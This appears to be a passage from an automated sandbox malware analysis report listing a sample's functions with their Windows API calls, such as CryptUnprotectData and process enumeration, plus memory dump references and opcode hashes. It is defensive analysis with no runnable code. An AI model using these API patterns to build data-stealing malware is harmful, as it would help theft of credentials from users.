                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                          • String ID:
                          • API String ID: 1066202413-0
                          • Opcode ID: 4c22abb717c1d66e1b5f5f7f519e9ce854234bfdf641f450d231e1107936b729
                          • Instruction ID: 51c4bac1977aa4ec39afafadd14ab42527183100780417400d6db856c977281f
                          • Opcode Fuzzy Hash: 4c22abb717c1d66e1b5f5f7f519e9ce854234bfdf641f450d231e1107936b729
                          • Instruction Fuzzy Hash: AB81F474900209CFD725CF19D948B95BBF1FF45329F29C1AAD4089B2B2D77A9D86CB80
                          Function 0051EA30 Relevance: 6.1, APIs: 4, Instructions: 98stringencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,?,00000000,00000000), ref: 0051EA76
                          • CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0051EA7E
                          • lstrcat.KERNEL32(0053CFEC,0053CFEC), ref: 0051EB27
                          • lstrcat.KERNEL32(0053CFEC,0053CFEC), ref: 0051EB49
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: de4e979ac104f3ee5efe038c6641a1b4fc9c0f2451080effd2d910c8c19b5078
                          • Instruction ID: 2fd6818a229421b3b3ebe86bdca0eed43e998060aebda35ea03ae81b640e523b
                          • Opcode Fuzzy Hash: de4e979ac104f3ee5efe038c6641a1b4fc9c0f2451080effd2d910c8c19b5078
                          • Instruction Fuzzy Hash: AE312B79A04119ABD710DB58EC45FEFBB7DEF85705F008166FA09E3140DBB45A04CBA6
                          Function 005340B0 Relevance: 6.0, APIs: 4, Instructions: 50memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?,?,?,?,?,?), ref: 005340CD
                          • GetProcessHeap.KERNEL32(00000000,?,?,?), ref: 005340DC
                          • RtlAllocateHeap.NTDLL(00000000), ref: 005340E3
                          • CryptBinaryToStringA.CRYPT32(?,?,40000001,?,?,?,?,?,?), ref: 00534113
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptHeapString$AllocateProcess
                          • String ID:
                          • API String ID: 3825993179-0
                          • Opcode ID: dc691e55f4d3750ee2c60a29feda59736ac3421c23f750ed1f1fac33aab27148
                          • Instruction ID: 504ad92bae2ece1a33cfd9e3446b0a0d34ae844d3d86cb1e3d769a76b46c4a87
                          • Opcode Fuzzy Hash: dc691e55f4d3750ee2c60a29feda59736ac3421c23f750ed1f1fac33aab27148
                          • Instruction Fuzzy Hash: F0015A74600209BBDB10CFA5DC89BABBBADEF85311F108059BE0897250EB71E940CBA4
                          Function 00532B60 Relevance: 6.0, APIs: 4, Instructions: 48memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?,?,00000000,0053A3D0,000000FF), ref: 00532B8F
                          • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 00532B96
                          • GetLocalTime.KERNEL32(?,?,00000000,0053A3D0,000000FF), ref: 00532BA2
                          • wsprintfA.USER32 ref: 00532BCE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: 1f316a6488a09349cb9aebe872067f6ff4204ca35a182eda46e90d7dbb23e3e9
                          • Instruction ID: 1b7643e17eeb9079fe3ddff1c2f66f85b744288ca44f315eb8f3c53b6a14591e
                          • Opcode Fuzzy Hash: 1f316a6488a09349cb9aebe872067f6ff4204ca35a182eda46e90d7dbb23e3e9
                          • Instruction Fuzzy Hash: 3E014CB6904129ABCB149BC9DD45BBFB7BCFB4DB11F00421AFA05A2290E7BC5840C7B5
                          Function 00519B20 Relevance: 6.0, APIs: 4, Instructions: 42encryptionmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00519B3B
                          • LocalAlloc.KERNEL32(00000040,00000000), ref: 00519B4A
                          • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00519B61
                          • LocalFree.KERNEL32 ref: 00519B70
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          • Opcode ID: ee6d4f2ff0d792ab250af0fdcdf02179e26de41b240784d0a1e542dccc65f8ab
                          • Instruction ID: bf33360c41605aab87866f8e3833f8bdbb6201121a66dec045f276d539c0d8b9
                          • Opcode Fuzzy Hash: ee6d4f2ff0d792ab250af0fdcdf02179e26de41b240784d0a1e542dccc65f8ab
                          • Instruction Fuzzy Hash: ACF01D743483126BF7305F64AC59F977BA8EF05B50F200115FA45EA2D0D7B49C80CAA8
                          Function 0052CAE0 Relevance: 4.6, APIs: 3, Instructions: 89comstringCOMMON
                          Download Yara Rule
                          APIs
                          • CoCreateInstance.COMBASE(0053B110,00000000,00000001,0053B100,?), ref: 0052CB06
                          • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104), ref: 0052CB46
                          • lstrcpyn.KERNEL32(?,?,00000104), ref: 0052CBC9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharCreateInstanceMultiWidelstrcpyn
                          • String ID:
                          • API String ID: 1940255200-0
                          • Opcode ID: 1fd256e973911b034c20374d2c0e1ed6f5463e6842ea6026c28108b76d0dd423
                          • Instruction ID: b23f65c9a0850bf02e124e8b52e3eae7b23b7323204c0aada455fb7e84c23a99
                          • Opcode Fuzzy Hash: 1fd256e973911b034c20374d2c0e1ed6f5463e6842ea6026c28108b76d0dd423
                          • Instruction Fuzzy Hash: 9B316671A40229AFD710DB94CC86F9E7BB9AF89B10F104184FA04EB2D0D7B1AE45CB90
                          Function 00519B80 Relevance: 4.5, APIs: 3, Instructions: 44memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00519B9F
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00519BB3
                          • LocalFree.KERNEL32(?), ref: 00519BD7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Local$AllocCryptDataFreeUnprotect
                          • String ID:
                          • API String ID: 2068576380-0
                          • Opcode ID: 9b1e119a9ce34374e97dfef291467505e6074db83ba0471dc0ee0a46c0099fce
                          • Instruction ID: 001738f37d574a792c73e8ef14c344f9fa68f8b8d2b7a18cee4df6c830a214b7
                          • Opcode Fuzzy Hash: 9b1e119a9ce34374e97dfef291467505e6074db83ba0471dc0ee0a46c0099fce
                          • Instruction Fuzzy Hash: 42011279E4520AABE710DBA4DC55FAFB778EB84700F104555EA04AB380D7749900C7D5
                          Function 008D5630 Relevance: 4.4, Strings: 3, Instructions: 678COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 7\v$<!SZ$}7<w
                          • API String ID: 0-995886960
                          • Opcode ID: 5adbc6a0e53cf275bc4f66e0ca7ddd9f268d861785324f8b27fcc9702fe161d5
                          • Instruction ID: d36b9d3b68f12377040f55565669939f8910fad63b5c877df33a2d383f51c17b
                          • Opcode Fuzzy Hash: 5adbc6a0e53cf275bc4f66e0ca7ddd9f268d861785324f8b27fcc9702fe161d5
                          • Instruction Fuzzy Hash: AB22F3F36086109FE304AE2DEC9177AB7E9EF94720F1A893DE6C5C7740E63558118693
                          Function 008D890D Relevance: 3.3, Strings: 2, Instructions: 839COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: w}|$z3Iw
                          • API String ID: 0-1710186478
                          • Opcode ID: c8589fe7c2af7e16b47a856f721bbf7a268feccd0e12bcb379b62a122ddc901f
                          • Instruction ID: ce1f80fb496bc8f8eb5ba8a925bc9b14764bf8bde82e26b0cf402505cb4b0e42
                          • Opcode Fuzzy Hash: c8589fe7c2af7e16b47a856f721bbf7a268feccd0e12bcb379b62a122ddc901f
                          • Instruction Fuzzy Hash: E942E4F36082049FE304AE2DDC8567AFBE9EF94720F1A493DE6C5C3744EA3598058696
                          Function 007D693F Relevance: 1.4, Strings: 1, Instructions: 193COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: N/[g
                          • API String ID: 0-3808919979
                          • Opcode ID: 6451233e9fa748997aad76e3e91810add5d31355493b99cb6bfa50515c6affa7
                          • Instruction ID: d5434ab805e8665b50c05aa476833e54dfa30bfbb6f0994f974d8e9194c09fb7
                          • Opcode Fuzzy Hash: 6451233e9fa748997aad76e3e91810add5d31355493b99cb6bfa50515c6affa7
                          • Instruction Fuzzy Hash: 43516BF37083049FE3085E2DEC9573ABBDAEBD8720F16863CE685C7784EA3559018656
                          Function 0083601D Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ~._s
                          • API String ID: 0-1817707076
                          • Opcode ID: a94c1f480fee412020bb18e3ccdc94a3c76d50d8dac0ad6ea3ef49b164c1eb9e
                          • Instruction ID: 383b157e171099b42f2f3611ba9a85cc3eee50bf962f5e81cd8966b75e485dc3
                          • Opcode Fuzzy Hash: a94c1f480fee412020bb18e3ccdc94a3c76d50d8dac0ad6ea3ef49b164c1eb9e
                          • Instruction Fuzzy Hash: F35117F26082049FF308AE39EC9577ABBD6EB44320F15453DEBC1C2784E97594458686
                          Function 008A8AAE Relevance: .2, Instructions: 188COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
